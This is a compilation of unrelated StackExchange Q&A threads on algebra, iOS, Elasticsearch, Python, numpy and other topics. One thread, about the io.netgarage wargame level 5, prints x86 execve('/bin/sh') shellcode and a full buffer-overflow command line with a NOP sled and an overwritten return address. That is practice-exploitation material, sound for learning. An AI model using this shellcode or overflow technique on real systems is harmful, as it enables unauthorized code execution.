Minimal polynomial of an algebraic element We have to determine the minimal polynomial over $\mathbb Q$ of the element $1+2^\frac{1}{3}+4^\frac{1}{3}$. Here is my work, please tell me where the mistake is: We want a polynomial with rational coefficients, so set $x = 1+2^\frac{1}{3}+4^\frac{1}{3}$. As $2^\frac{1}{3}-1$ is not zero, we can multiply both sides by it to get $(2^\frac{1}{3}-1) x = 1$, so $2^\frac{1}{3} x = x + 1$, which we can now cube to get $2 x^3 = x^3 + 3 x^2 + 3 x + 1$, which is $x^3 - 3 x^2 - 3 x - 1 = 0$. As $1$ and $-1$ are the only candidates for rational zeroes, we see that this is irreducible over $\mathbb Q$, so this should be the minimal polynomial. The problem is: they get $x^3-6 x- 6$ and that is correct.... So, I am wondering where I made a mistake, not how they came to their solution. $x^3-6x-6$ is the minpoly of $2^{1/3}+4^{1/3}$, not $1+2^{1/3}+4^{1/3}$. Your reasoning is correct 100%, and they made a mistake because $X^3-6X-6$ is the minimal polynomial for $x-1$, not $x$ Thanks a lot, helped me.... I closed this as a duplicate even though I answered the target. This was because there were no other answers. But, to tell you the truth, I was looking for duplicates of this, found both of these, acted, and only then realized that I have answered the older one. If I would remember...
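A quick floating-point sanity check (my own addition, standard library only) confirms both polynomials against the corresponding elements:

```python
# x = 1 + 2^(1/3) + 4^(1/3) should satisfy x^3 - 3x^2 - 3x - 1 = 0,
# while y = x - 1 = 2^(1/3) + 4^(1/3) should satisfy y^3 - 6y - 6 = 0.
x = 1 + 2 ** (1 / 3) + 4 ** (1 / 3)
y = x - 1

residual_x = x**3 - 3 * x**2 - 3 * x - 1
residual_y = y**3 - 6 * y - 6

print(abs(residual_x) < 1e-9, abs(residual_y) < 1e-9)  # → True True
```

Both residuals vanish up to rounding error, so the asker's polynomial and the book's polynomial are each correct — just for different elements.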
common-pile/stackexchange_filtered
iOS: Embed Table View in other View (but table view has a complex table view controller..) I'm struggling with this problem, so I need your help. Basically I've programmed a complex table view controller (with NSFetchedResults protocol etc) and already used it in my app and it worked great. Since I want now exactly this table view inside another view (so I can add a small subview at the bottom of the screen), I'm really struggling with how to do this! I know by now how to embed a simple table view inside another view and link it to its view controller. But how can I do this in my case with as little effort as possible? I mean can I somehow use this table view controller I already have even though the superview must have its own view controller?! And how would I do that? Sorry I'm still a beginner :) Since you already have a TableViewController, to add it as a subview to another ViewController's (self) view, do this:

TVC = <your tableViewController instance>;
[self addChildViewController:TVC];
TVC.view.frame = <your desired frame>;
[self.view addSubview:TVC.view];

Adding the TVC as a childViewController will forward UI methods of 'self' like willAppear and all to TVC. Hi Thanks a lot. But what I don't yet understand is this TVC.view.frame = your desired frame. I've laid out the layout in Xcode so what exactly would that frame be? If you have laid it out using a XIB, then there is no need to set the frame. Go to the XIB and take a tableViewController object. Set the tableViewController object's file owner as your custom tableViewController class, by changing the class name in the identity inspector (3rd button from left, in the right pane), then add the tableView you added to this TableViewController's view, and set the delegate and datasource accordingly. Sorry I still don't understand 100% :-( Let's put it that way: So far I have a complex TableViewController. As far as I understand (and did so far) I selected a normal ViewController and gave its view two subviews.
A normal view and a table view. But from here on I don't get it. I subclassed a normal view controller for the top view controller in order to set all the necessary connections for the subviews. But now I'm stuck…I mean in a normal table view controller I don't need to set delegate and data source, but what do I do here actually?! No idea what code to put in the top view controller. A normal tableViewController already has the dataSource and delegate connected. After the point where you have added those two subviews, take a tableViewController object and connect its view outlet to the tableView (2nd subview), and for that tableView (go to the connection inspector, the last button) connect the data source and delegate accordingly, i.e., to the class where you will be writing cellForRow and other such methods - most probably to the newly added tableViewController object. Thanks again for your help! Current situation: I've changed this complex table view controller to have an IBOutlet for a tableview and instead of subclassing tableviewcontroller, it implements both tableview protocols. My new super view controller inherits from this new CoreDataViewController and I've set the tableView outlet to the embedded table view, and from this tableview the data source and delegate to the super view controller. Now my data gets displayed. However, it doesn't go to edit mode (which worked before)…any idea why? Did I hook up something wrong? Assuming that your data is getting displayed properly, the didSelect method is getting called when you tap on the cell, as are all other normal tableview methods. Check whether you have implemented the canEditRowAtIndexPath delegate method in your delegate class to return YES.
common-pile/stackexchange_filtered
how to register asphttp.conn component I need to do enhancements to a classic asp application which uses AspHTTP.Conn. I am trying to set up the application on my system. I have the dll, but I am not sure how to install and set it up on my system. Can you please help with the steps to register the AspHTTP dll on my system. what version of OS you have? 32bit or 64bit? what version of IIS you have? it is windows 7 OS 64 bit with IIS 7.5 version Did you check the AspHTTP dll documentation? http://www.serverobjects.com/comp/asphttp3.htm Never mind. Answer is: Steps can vary, depending on the library (sorry, I have never used the AspHTTP dll before) and on the version of IIS and of course the version of the Operating System. In general the steps for any library are:

Step 0) Find a proper folder where you are going to store your DLL. If the DLL is required for only 1 web site (let's say for the "Web01" web site only), I usually keep them in a folder like "X:\InetPub\Web01\Dll\"

Step 1) regsvr32 YourDLL.dll - if you have a 64 bit OS and a 32 bit library (DLL) then you should run C:\Windows\SysWOW64\regsvr32.exe. If you have a 64 bit OS and a 64 bit library (DLL) then you should run C:\Windows\System32\regsvr32.exe.

Step 2) Depending on the folder where you store your DLL: if you store the DLL in the Windows\systemXX folder, then you may skip this step. Otherwise you will probably need to add read & execute permission on this DLL file for the user which runs your web site or application pool - it depends on the IIS version you are using and the authentication method you are using for your web site. (I always create separate users, so for my "Web01" web site the user name will be something like "IUSR_Web01".)

Step 3) Perhaps in IIS (in IIS 6.0) it will be required to add this DLL to "Web Service Extensions" with Status = Allowed.
common-pile/stackexchange_filtered
Wargame payload segfaults when used as such I am currently trying to complete Level5 of the io.netgarage.org wargame. To complete it I wrote the following asm payload:

global _start
section .text
_start:
    xor eax, eax
    push eax
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80

which should spawn a shell by calling sys_execve, and it does. But only as long as I don't use it as an actual payload. As soon as I try to feed it to the vulnerable C program, I get segfaulted. By inspecting it with gdb, I was able to pin the segfault to the line mov edx, esp. Everything that should happen before (overwriting the return address, NOP sled) actually works as intended. Additional information:

- I get the opcodes by compiling the above asm code with nasm -f elf32 file.asm -o file.o and objdump -d file.o
- I call the vulnerable program like this: /levels/level05 $(python -c 'print "\x90"*115 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\xa0\xfb\xff\xbf"')
- The return address 0xbffffba0 I got by inspecting the values of the stack with gdb
- My current assumption is that it has something to do with the stack, because a script I found online, utilizing a jmp-call-pop pattern, worked seemingly correctly

Thank you, tarkes

mov edx, esp can not fault, you used gdb wrong. Unless the code is in non-executable memory, but you claim that is not the case. PS: nasm can produce a listing, you don't need to objdump @Jester You are right: while the view I get when using layout asm shows me on the corresponding address the instruction mov edx, esp, examining the instruction pointer and/or the address directly gives me add ch, edi... Where does the discrepancy come from? add ch, edi doesn't even exist... @Jester Amazing, huh? Thank you, I found the problem now: I overwrite my shellcode by pushing onto the stack. I am sorry if this was a stupid question.
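As an aside, the layout arithmetic of that payload can be sanity-checked in Python (my own snippet; the offsets are the ones from the exploit command above): 115 sled bytes, 25 bytes of shellcode, then the 4-byte return address.

```python
# Rebuild the payload from the exploit command above and check its layout.
shellcode = (
    b"\x31\xc0\x50\x68\x6e\x2f\x73\x68"      # xor eax,eax; push eax; push 'n/sh'
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50"      # push '//bi'; mov ebx,esp; push eax
    b"\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"  # mov edx,esp; push ebx; mov ecx,esp; mov al,11; int 0x80
)
ret_addr = b"\xa0\xfb\xff\xbf"               # 0xbffffba0, little-endian
payload = b"\x90" * 115 + shellcode + ret_addr

print(len(shellcode), len(payload))  # → 25 144
```

Every push the shellcode executes moves esp toward the buffer that holds the shellcode itself, which is exactly the overwrite the asker discovered.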
common-pile/stackexchange_filtered
Why is this command exploding So I got this as an answer to a previous question, for looking recursively through files in a directory and deleting the files and directories if found:

find \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -exec rm -rf "{}" \;

There are two problems with this. One:

find: `./adam.balan/AisisAjax/.git': No such file or directory

Because of this error the rest of the script doesn't execute. Now I don't want to have to check for any of the files or folders. I don't care if they exist or not, I want to suppress the error on this. The second is that I am also getting the error on a directory that needs to be excluded from this search: vendor/

find: `./vendor/adam.balan/AisisAjax/.git': No such file or directory

I do not want it searching vendor. I want it to leave vendor alone. How do I solve these two problems? Suppression and ignoring. The problem is that you're deleting a directory that find then tries to descend into. You can use -prune to prevent that:

find \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -prune -exec rm -rf "{}" \;

To ignore all errors, you can use 2> /dev/null to squash the error messages, and || true to avoid set -e making your script exit:

find \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -prune -exec rm -rf "{}" \; 2> /dev/null || true

Finally, to avoid descending into any directory named 'vendor', you can use -prune again:

find -name vendor -prune -o \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -prune -exec rm -rf "{}" \; 2> /dev/null || true
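A quick self-contained check of the final command (the directory names here are made up for the demo): it deletes the matched entries, leaves vendor/ untouched, and produces no "No such file or directory" errors.

```shell
set -e
# Build a throwaway tree with matches inside and outside vendor/.
tmp=$(mktemp -d)
mkdir -p "$tmp/proj/.git" "$tmp/proj/src" "$tmp/proj/vendor/pkg/.git"
touch "$tmp/proj/.gitignore" "$tmp/proj/src/main.c"
cd "$tmp"

# Delete .git/.gitignore/Documentation everywhere except under vendor/.
find . -name vendor -prune -o \
     \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) \
     -prune -exec rm -rf "{}" \; 2> /dev/null || true

ls "$tmp/proj"   # src and vendor survive; .git and .gitignore are gone
```

The first `-prune` keeps find out of vendor/ entirely; the second stops it from descending into a directory it is about to delete, which is what caused the original error.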
common-pile/stackexchange_filtered
What is the correct way to express a number with all its digits? I have the following table: On the last column, I have expressed the numbers in billions as it is mentioned at the top. However, I want the last number (Final sample size) to be expressed fully. Is there a way that I can be specific about the fact that this is the full number and not rounded up in billions? Thank you! I'm probably missing something obvious, but isn't that last sum 205 million rather than billion? In addition to the comment from @SConroy, I find the number shown for the final total quite confusing: it is still in a column headed "(in billions)", which (according to your description) is not correct. If the final total is in different units from that shown at the top of the column, then the description at the left of that row should be amplified. @TrevorD That is what I am looking for. As I have said, the column until the final cell I have expressed in billions, and I am looking for a way to suggest that the final number is the full or exact number (Exactly what you are suggesting) But you still haven't addressed the issue raised by @SConroy that there is inconsistency as to whether your final total is in millions or billions! @TrevorD ah sorry! The final number is expressed in all digits. It is 205 millions 813 thousands 022 How can the grand total be 205+ million, when the first item listed in the column is 26.5 billion, & the second item in the column is 6.01 billion? That is the final sample size after all the filters. After filter number 7, there 205,813,022 observations left. It is not the sum of the steps I still don't understand the table! If you start with 26.5 billion, and then subtract the figures given in the final column, you are still left with 9.71 billion! So I don't understand the table. In any case, if the number shown at the bottom is a remainder - not a total - then surely the last line should say "Remaining sample size", not "Final sample size"? 
I'm voting to close this Q. because it's 'Not clear what you are asking'. @TrevorD You start with the raw sample and then after you apply each filter, you are left with a number of observations. There is more information about this table in its title in my document, where it is explained how to look at each step. That was not my question. I was merely asking how to express a number not rounded up or down in any way. I agree with your suggestion about changing to the remaining sample size, but the other stuff... does not matter in my opinion, because it is not what I asked On this site, it is not unusual for the underlying Q. not to be immediately apparent from the Q. as asked. Therefore, I (& others) sometimes take the view that we are not prepared to offer an answer without being sure that we fully understand what is being presented to us. In that respect - & as previously pointed out - your final figure shows a number in millions, but was in a column headed "billions" and is referred to in the last word of your Q. as "billions". Therefore I was not prepared to offer an answer about how to refer to the final 'value' until I understood its actual value. I also refer you to the comments from @JasonBassford below the accepted answer - and which postdate your last reply to me - that "the table is unclear and should be reformatted. (Personally, I'd remove the final cell from the table altogether and express it separately.)" Let us continue this discussion in chat. The most common word for a number that is not rounded up or down, nor approximated in any way is "exact". The fact that the number is without a decimal and expressed to nine significant figures should be enough for most people to realize it is the exact number, but you can indicate it specifically if you like. Also note that, despite the comments under the question, the final cell is not necessarily part of the existing columns.
It only appears to be because it is underneath all of the other rows that are underneath the headings. But by making it a single cell, it could easily be seen as not following those headings. After all, final sample size is not a filtering step, so the number shouldn't have to be # of obs. (in billions) either. It just means that the table is unclear and should be reformatted. (Personally, I'd remove the final cell from the table altogether and express it separately.)
common-pile/stackexchange_filtered
ElasticSearch doesn't return "deletebyquery" task when I query the list of tasks I'm using ElasticSearch 7.1.1 and use the delete_by_query API to remove required documents asynchronously. As a result, that query returns a task id to me. When I execute the next query:

GET {elasticsearch_cluster_url}/_tasks/{taskId}

I'm able to get the corresponding document for the task. But when I try to execute such a query:

GET {elasticsearch_cluster_url}/_tasks?detailed=true&actions=*/delete/byquery

I don't see my task in the result list. I also tried to execute such a query:

GET {elasticsearch_cluster_url}/_tasks

And I got such a response:

{
  "nodes": {
    "hWZQF7w_Rs6_ZRDZkGpSwQ": {
      "name": "0d5027c3ae6f0bb0105dcdb04470af43",
      "roles": [ "master", "data", "ingest" ],
      "tasks": {
        "hWZQF7w_Rs6_ZRDZkGpSwQ:194259297": {
          "node": "hWZQF7w_Rs6_ZRDZkGpSwQ",
          "id": 194259297,
          "type": "transport",
          "action": "cluster:monitor/tasks/lists",
          "start_time_in_millis": <PHONE_NUMBER>682,
          "running_time_in_nanos": 214507,
          "cancellable": false,
          "headers": { }
        },
        "hWZQF7w_Rs6_ZRDZkGpSwQ:194259298": {
          "node": "hWZQF7w_Rs6_ZRDZkGpSwQ",
          "id": 194259298,
          "type": "direct",
          "action": "cluster:monitor/tasks/lists[n]",
          "start_time_in_millis": <PHONE_NUMBER>682,
          "running_time_in_nanos": 84696,
          "cancellable": false,
          "parent_task_id": "hWZQF7w_Rs6_ZRDZkGlDwQ:194259297",
          "headers": { }
        }
      }
    }
  }
}

I'm not sure, maybe that query returns the tasks only from the one cluster node that accepted the query? Why is my task missing in the last query? Is there some mistake in my query parameters? Can you try *byquery instead of */delete/byquery? @Val actually I tried it, but also couldn't get my task in the response. Can you show the full response you get from GET _tasks? @Val I used such a query: GET {es_url}/_tasks/?detailed=true&actions=*byquery. I'll add the response to the post No just GET _tasks please If your delete by query call is very short-lived, you're not going to see it in _tasks after the query has run.
If you want to keep a trace of your calls, you need to add ?wait_for_completion=false to your call. While the query is running, you're going to see it using GET _tasks; however, when the query has finished running, you won't see it anymore using GET _tasks, but with GET .tasks/_search instead. After it's done running, and provided you have specified wait_for_completion=false, you can see the details of your finished task with GET .tasks/task/<task-id> I use 'wait_for_completion=false' and I'm able to get the task using 'GET .tasks/task/', but can I get the list of all such tasks filtered by the 'deletebyquery' action type? That was my initial question If you're able to GET .tasks/task/<task-id> it means the task is finished, so it won't show up using GET _tasks anymore. You can catch them using GET _tasks?actions=*byquery&detailed only while they are running Thank you for the clarification, it helped me figure out how to do what I wanted in another way :)
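The server-side filter in ?actions=*byquery is an ordinary wildcard match against each task's action name. If it helps to see the mechanics, here is a client-side sketch of the same filtering in Python; the response shape and action names are modeled on the thread, and note that, as the answer explains, delete-by-query tasks only appear in _tasks while they are still running:

```python
import fnmatch

def filter_tasks(tasks_response, action_pattern):
    """Collect tasks whose 'action' matches a wildcard pattern,
    mimicking what GET _tasks?actions=... does on the server."""
    matches = {}
    for node in tasks_response.get("nodes", {}).values():
        for task_id, task in node.get("tasks", {}).items():
            if fnmatch.fnmatch(task["action"], action_pattern):
                matches[task_id] = task
    return matches

# A trimmed-down response shaped like the one in the question.
sample = {
    "nodes": {
        "hWZQF7w_Rs6_ZRDZkGpSwQ": {
            "tasks": {
                "hWZQF7w_Rs6_ZRDZkGpSwQ:1": {
                    "action": "indices:data/write/delete/byquery"},
                "hWZQF7w_Rs6_ZRDZkGpSwQ:2": {
                    "action": "cluster:monitor/tasks/lists"},
            }
        }
    }
}

running_deletes = filter_tasks(sample, "*byquery")
```

Against this sample, "*byquery" picks out only the delete-by-query task, which matches the behaviour the commenters describe.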
Screen tear or I don't know what to call it when using chrome I rarely post questions, but this has been bugging me since I started using Ubuntu 14.04; previously I was using Win8.1 without any issues. My screen has a tear when using chrome which looks like dead pixels, or what seems to be tearing when I minimize and maximize back, and it actually shifts the screen a little to the right. Sometimes I even have to click a little to the left to be accurate at clicking things. Here's a screenshot; you can see it clearly vertically, down right beside the launcher/docker:
Koi or goldfish? How do I differentiate between a koi and a goldfish? As far as I know, both are carp. So is it a big goldfish or a small koi? http://fishgirlwrites.blogspot.com/2012/11/differences-between-goldfish-and-koi.html Your picture shows a koi; goldfish have a shorter body and no barbels, and the underside of the jaw is more rounded in goldfish. The information is easy to find online, so I'm posting this as a comment, not an answer. Koi generally have much larger price tags too.
Writing into text file as tab separated columns in Python I have two lists A = ["ATTTGTA", "ATTTGTA", "ATTTGTA", "ATTTGTA"] A_modified = ["ATTGTA", "AAAT", "TTTA"] I want an output tab-separated txt file looking like ATTTGTA ATTGTA ATTTGTA AAAT ATTTGTA TTTA I tried the following piece of code, but it does not write the output in two columns, just as new rows each time with open ('processed_seq.txt','a') as proc_seqf: proc_seqf.write(A) proc_seqf.write("\t") proc_seqf.write(A_modified) This is the output I get ATTTGTA ATTGTA ATTTGTA AAAT ATTTGTA TTTA I suggest using the csv module. write() does not add a newline by itself; the newlines here are coming from the strings. proc_seqf.write("%s\t%s" % (A, A_modified)) might also work as a replacement for all of your write() lines, but using zip is probably the best way to get it organized in a meaningful way first, then follow mihai's answer I realised this is happening due to the following problem: each of the lists looks like A = ["ATTTGTA\n", "ATTTGTA\n",..] and that is why the new line gets added. Can you tell me how to get rid of the \n at the end? Thanks Just found that using str.strip on the strings after reading them from the text file, and before creating the output string, solved all my problems. Thanks You just need to pair the elements in the two lists. You can do that using the zip function: with open ('processed_seq.txt','a') as proc_seqf: for a, am in zip(A, A_modified): proc_seqf.write("{}\t{}\n".format(a, am)) I have also used format (see specs) to build each line, and the trailing "\n" puts each pair on its own line. What about something like this? It provides you with some flexibility in input and output..
lines = [ ['a', 'e', '7', '3'], ['b', 'f', '1', '5'], ['c', 'g', '2', '10'], ['d', 'h', '1', '14'], ] def my_print( lns, spacing = 3 ): widths = [max(len(value) for value in column) + spacing for column in zip(*lns)] proc_seqf = open('processed_seq.txt','a') for line in lns: pretty = ''.join('%-*s' % item for item in zip(widths, line)) print(pretty) # debugging print proc_seqf.write(pretty + '\n') proc_seqf.close() return my_print( lines ) I added the option that the user can decide the size of the spacing.. To match with your example data: A = ["ATTTGTA", "ATTTGTA", "ATTTGTA", "ATTTGTA"] A_modified = ["ATTGTA", "AAAT", "TTTA"] lines = [ A, A_modified ] If your lists are huge, I suggest using itertools.cycle(): import itertools ac=itertools.cycle(A) a_mc=itertools.cycle(A_modified) with open ('processed_seq.txt','a') as proc_seqf: for i in A_modified: proc_seqf.write("{}\t{}\n".format(next(ac), next(a_mc))) Apart from other great answers, as an alternative with try/except it will write all remaining elements in the list if their lengths are different (at least in your sample): with open ('processed_seq.txt','w') as proc_seqf: for each in range(max(len(A), len(A_modified))): try: proc_seqf.write("{}\t{}\n".format(A[each], A_modified[each])) except IndexError: if len(A) > len(A_modified): proc_seqf.write("{}\t\n".format(A[each])) else: proc_seqf.write("\t{}\n".format(A_modified[each])) cat processed_seq.txt ATTTGTA ATTGTA ATTTGTA AAAT ATTTGTA TTTA ATTTGTA
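Pulling the thread's accepted pieces together — str.strip to drop the trailing "\n" the asker discovered in his lists, and zip to pair the columns — a minimal end-to-end sketch (the input lists and file name are just the question's example):

```python
A = ["ATTTGTA\n", "ATTTGTA\n", "ATTTGTA\n"]
A_modified = ["ATTGTA", "AAAT", "TTTA"]

# strip() removes the '\n' that sneaks in when the strings are read
# from a file; zip() pairs the two columns row by row.
rows = ["{}\t{}".format(a.strip(), am.strip())
        for a, am in zip(A, A_modified)]

with open("processed_seq.txt", "w") as proc_seqf:
    proc_seqf.write("\n".join(rows) + "\n")
```

Opening the file in "w" mode (rather than "a" as in the question) also avoids stale rows piling up across runs.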
Uses classes to open an excel csv file and return values based on the maximum weight in a specific column I've been given this Class file that contains functions: import csv import warnings from datetime import date conv_fn = { 'name': str, 'country': str, 'operator': str, 'users': str, 'purpose': str, 'perigee': float, 'apogee': float, 'eccentricity': float, 'launch_mass': float, 'date_of_launch': date.fromisoformat, 'expected_lifetime': float } def warn_caller(message: str, category=None, stacklevel=3): """Wrapper around UserWarning that has stacklevel of 3""" warnings.warn(message, category, stacklevel) def simple_format(message, category, filename, lineno, line=None): if line is None: import linecache line = linecache.getline(filename, lineno).strip() return ( "SatDB Warning:\n" f" File: \"(unknown)\", line {lineno}\n {line}" f"\n{category.__name__}: {message}\n" ) warnings.formatwarning = simple_format # NOTE: For testing, use warnings.simplefilter("ignore") class SatDB(object): """Class to provide interaction with a satellite database. Methods ------- get_number_satellites get_sat_data add_field_of_data """ def __init__(self, filename): """Construct a SatDB object. Parameters ---------- filename : string A CSV file with data for satellites. """ with open(filename, 'r') as sat_csv_file: data_list = list(csv.reader(sat_csv_file, delimiter=',')) # parse header to get fields in data file self._fields = data_list[0].copy() self._fields.pop() # remove trailing empty field # assemble data as list of dictionaries, each dictionary represents satellite data self._data = [] for row in data_list[1:]: self._data.append({}) for pos, field in enumerate(self._fields): self._data[-1][field] = conv_fn[field](row[pos]) def get_number_satellites(self): """Returns the number of satellites in the database.""" return len(self._data) def get_sat_data(self, idx, fields): """Returns a selection of data for a given satellite. The caller provides a satellite id and list of fields. 
The method returns data associated with those fields for the given satellite. If the satellite is not present in database, or a specific field is not available, then an empty tuple is returned. If even one field is missing, the entire query is returned as empty. Parameters ---------- idx : int Index of satellite in database. fields : list[string] List of strings; each string is a desired field from database for given satellite Returns ------- tuple Tuple contains values in order of provided list of fields An empty tuple indicates that no data could be found """ # Hand back an empty tuple for all early exits if not (0 <= idx < self.get_number_satellites()): warn_caller(f"Satellite index {idx} out of range") return tuple() if not isinstance(fields, (tuple, list)): warn_caller("Must pass a list or tuple of fields") return tuple() values = [] for field in fields: if field in self._data[idx]: values.append(self._data[idx][field]) else: # We've hit an invalid field, so entire query is invalid warn_caller(f"Database does not contain field '{field}'") return tuple() return tuple(values) def add_field_of_data(self, field, data): """Adds a new field to satellite database The caller provides a field name and an iterable of data (eg. list or numpy array). This is added to the database. If field name is already present in database, then this method OVERWRITES existing data with what is supplied here. The amount of data must match number of satellites in database. If it does not match, then no action is performed. A warning is given and the method returns without altering the database. 
Parameters ---------- field : string Name of field for additional data data : list|tuple|ndarray An iterable object containing data for each satellite """ n_sats = self.get_number_satellites() if len(data) != n_sats: warn_caller( "Could not add field data because amount of data is incorrect " f"(expected {n_sats}, got {len(data)})" ) return if not isinstance(field, str): warn_caller("Only a single field of data can be added at a time") return for i in range(n_sats): self._data[i][field] = data[i] return __all__ = ["SatDB"] if __name__ == '__main__': sat_db = SatDB('test.csv') n_sats = sat_db.get_number_satellites() print(f"number of satellites in database: {n_sats}") sat_id = 23 (operator, launch_mass) = sat_db.get_sat_data(sat_id, ['operator', 'launch_mass']) print(f"id: {sat_id} operator: {operator} launch-mass: {launch_mass}") However, in a separate file I'm meant to import this class file and write a function that returns a tuple containing the name, mass, etc. of the largest object within the excel document. I'm kind of lost on how to use the information already found in the class file and use it across to a different file without creating errors. I've tried the following code: def find_largest_by_mass(testdb): idd = [] Mass = [] HEADER_ROW = 0 FIRST_ROW = 1 for index, row in enumerate(data_list): if index == HEADER_ROW: data_headers = row[2:] elif index >= FIRST_ROW: mass = row[7:] line_count = index - FIRST_ROW + 1 data_array = np.array(mass, dtype = float) However, I get the error "name 'data_list' is not defined" testdb = SatDB('test_database.csv') (max_idx, name, max_mass) = find_largest_by_mass(testdb) print(f"{max_idx}: {name} has largest launch mass at {max_mass} kg.") The task requires us to use the function as seen, where I thought using the SatDB in the first line would enable the data_list from the SatDB class to be used. Any help is very much appreciated, thank you. data_list is not in the scope of your function. You need to access the data from your object testdb. 
The data is stored in SatDB._data. You could access this member in your function as testdb._data. However, the leading underscore is a convention for private class members, so you should instead use the getter method get_sat_data to retrieve the needed data from your object.
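To make that concrete, here is one way find_largest_by_mass could be written against SatDB's public interface only. The tiny FakeDB class below is not part of the assignment; it just stands in for SatDB('test_database.csv') so the function can be demonstrated, and the field name 'launch_mass' is taken from the conv_fn table in the class file:

```python
def find_largest_by_mass(db):
    """Return (index, name, launch_mass) for the heaviest satellite,
    using only the database's public getter methods."""
    best = None
    for idx in range(db.get_number_satellites()):
        data = db.get_sat_data(idx, ['name', 'launch_mass'])
        if not data:          # empty tuple -> data missing, skip row
            continue
        name, mass = data
        if best is None or mass > best[2]:
            best = (idx, name, mass)
    return best

# Hypothetical stand-in for a SatDB loaded from CSV, for demonstration only.
class FakeDB:
    _rows = [{'name': 'SatA', 'launch_mass': 250.0},
             {'name': 'SatB', 'launch_mass': 4100.0},
             {'name': 'SatC', 'launch_mass': 980.0}]

    def get_number_satellites(self):
        return len(self._rows)

    def get_sat_data(self, idx, fields):
        return tuple(self._rows[idx][f] for f in fields)

max_idx, name, max_mass = find_largest_by_mass(FakeDB())
```

With the real class this becomes testdb = SatDB('test_database.csv') followed by find_largest_by_mass(testdb), exactly the calling pattern shown in the question.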
dynamically bind data values into a repeater I'm trying to bind the data values to a repeater, with the bank name and balance of each bank. The balance is calculated as balance = sum(debit) - sum(credit), and I'm trying to get a result like: ------------------- bank name | amount| ------------------| a | 1200 | ------------------| b | 1500 | ------------------| c | 2400 | ------------------- For this I used the code: protected void bank_account() { var balance = 0; using (var context = new sem_dbEntities()) { var query = (from b in context.banks join h in context.heads on b.h_id equals h.h_id where b.bankstatus != 3 && (h.pid == 13 || h.h_id == 9) select new { b.acc_name, b.h_id }).Take(4); foreach (var item in query) { var debit1 = (from p in context.ledgers where p.h_id == item.h_id select p.debit).Sum(); var credit1 = (from q in context.ledgers where q.h_id == item.h_id select q.credit).Sum(); balance = Convert.ToInt32( debit1 - credit1); var query1 = (from b in context.banks join h in context.heads on b.h_id equals h.h_id where b.bankstatus != 3 && (h.pid == 13 || h.h_id == 9) select new { b.acc_name, b.h_id, balance }).Take(1); foreach (var item1 in query1) { Repeater1.DataSource = query1.ToList(); Repeater1.DataBind(); } } } } What does this have to do with MVC? What does this have to do with Classic ASP? Comment out the foreach (var item1 in query1) loop. I commented out that line but it's still not binding properly
ModuleNotFoundError: No module named 'numpy.core._multiarray_umath' (While installing TensorFlow) I am following this tutorial to install TensorFlow (https://www.tensorflow.org/install/pip), but on the last command: python -c "import tensorflow as tf; tf.enable_eager_execution(); print(tf.reduce_sum(tf.random_normal([1000, 1000])))" I get this result: ModuleNotFoundError: No module named 'numpy.core._multiarray_umath' ImportError: numpy.core.multiarray failed to import The above exception was the direct cause of the following exception: Traceback (most recent call last): File "<frozen importlib._bootstrap>", line 980, in _find_and_load SystemError: <class '_frozen_importlib._ModuleLockManager'> returned a result with an error set ImportError: numpy.core._multiarray_umath failed to import ImportError: numpy.core.umath failed to import 2019-02-16 12:56:50.178364: F tensorflow/python/lib/core/bfloat16.cc:675] Check failed: PyBfloat16_Type.tp_base != nullptr I have already installed numpy, as you can see: pip3 install numpy Requirement already satisfied: numpy in c:\programdata\anaconda3\lib\site-packages (1.15.4) So why do I get this error message, and how can I fix it on Windows 10? Just upgrade the numpy module using pip install --upgrade numpy; it will fix your problem I upgraded numpy to version 1.16.1 and tried the above command again: python -c "import tensorflow as tf; tf.enable_eager_execution(); print(tf.reduce_sum(tf.random_normal([1000, 1000])))" and got this new result: 2019-02-16 13:12:40.611105: I tensorflow/core/platform/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 tf.Tensor(-1714.2305, shape=(), dtype=float32) It means you have successfully installed Tensorflow. Upgrading numpy from 1.15.4 to 1.16.1 also fixed this for me. Upgrade numpy to solve the error: pip install numpy --upgrade This fixed it. Tensorflow 1.13 requires Numpy 1.16 and I had 1.14 instead. 
I had numpy version 1.16.2 but it was giving the same error; then I tried installing 1.16.1 and it worked for me. Try this: pip install --upgrade --force-reinstall numpy Ensure that you're using Python 3.x by running it as python3 -c "import tensorflow as tf; tf.enable_eager_execution(); print(tf.reduce_sum(tf.random_normal([1000, 1000])))" I just upgraded my numpy from 1.14.0 to 1.17.0 with the following command on Ubuntu 18.10. sudo python3.5 -m pip install numpy --upgrade No import error then. There may be multiple reasons for this error, so I would go through the solutions one by one; hopefully one of the steps will solve your problem: Update your Numpy or reinstall it. Check your interpreter directory (go to Settings > Project > Python Interpreter) and the Numpy package directory (in your terminal use the command pip show numpy). These two directories should match; if they do not, go to (Settings > Project > Python Interpreter > Add Interpreter > Show All > show interpreter path) and then add the package directory. If none of the above solutions worked, go to (Settings > Project > Python Interpreter > Add Interpreter > Add Local Interpreter) and change it from a virtual environment to a conda environment.
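The answers above converge on a simple rule of thumb: TensorFlow 1.13 wants NumPy 1.16 or newer. A quick, dependency-free sketch of how one might check the installed version before importing TensorFlow; the 1.16.0 floor is taken from the answers, and this naive parser ignores pre-release suffixes, so a real project would prefer packaging.version:

```python
def version_tuple(v):
    """'1.16.1' -> (1, 16, 1), so versions compare numerically
    instead of lexically ('1.9' would otherwise sort after '1.16')."""
    return tuple(int(part) for part in v.split(".")[:3])

def meets_minimum(installed, minimum="1.16.0"):
    """True if the installed version is at least the required minimum."""
    return version_tuple(installed) >= version_tuple(minimum)
```

meets_minimum(numpy.__version__) returning False is a hint to run pip install --upgrade numpy before trying the TensorFlow import again.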
